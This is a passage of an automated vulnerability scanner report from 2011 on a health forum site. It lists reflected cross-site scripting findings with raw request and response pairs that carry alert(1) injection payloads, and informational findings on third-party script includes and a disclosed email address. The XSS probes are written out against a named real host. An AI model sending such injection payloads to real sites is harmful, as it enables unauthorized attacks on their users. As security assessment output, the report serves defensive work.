GET /webmd-exchanges/womens-health-exchanges?234df"-alert(1)-"24c278a6922=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74543
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:05 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/womens-health-exchanges?234df"-alert(1)-"24c278a6922=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.57. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b7f'-alert(1)-'2f6b2a8bb19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/womens-health-exchanges?44b7f'-alert(1)-'2f6b2a8bb19=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74525
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
nsactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fwomens-health-exchanges%3f44b7f'-alert(1)-'2f6b2a8bb19%3d1&artid=091e9c5e805cbde9&inst=0&amp;leaf=">
...[SNIP]...

2. Cross-domain script include  previous  next
There are 15 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://exchanges.webmd.com/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.htm HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113071
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.2. http://exchanges.webmd.com/pet-health-exchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pet-health-exchange HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 286580
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.3. http://exchanges.webmd.com/skin-and-beauty-exchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /skin-and-beauty-exchange HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 301520
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.4. http://exchanges.webmd.com/webmd-exchanges/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/blogs HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98825
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.5. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/cancer-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69582
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.6. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/digestive-disorders-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66936
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.7. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/eating-diet-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70088
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.8. http://exchanges.webmd.com/webmd-exchanges/health-experts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/health-experts HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139152
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.9. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/mens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67398
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:00 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.10. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/mental-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70529
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:45 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.11. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/parenting-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78693
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.12. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/pregnancy-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73199
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:17 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.13. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/sex-relationships-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66635
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:47 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.14. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/trying-to-conceive-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70893
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.15. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/womens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74358
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

3. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /pet-health-exchange HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 286580
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a rel="nofollow" href="mailto:home2strays@aol.com">home2strays@aol.com</a>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sat Feb 12 08:35:38 CST 2011.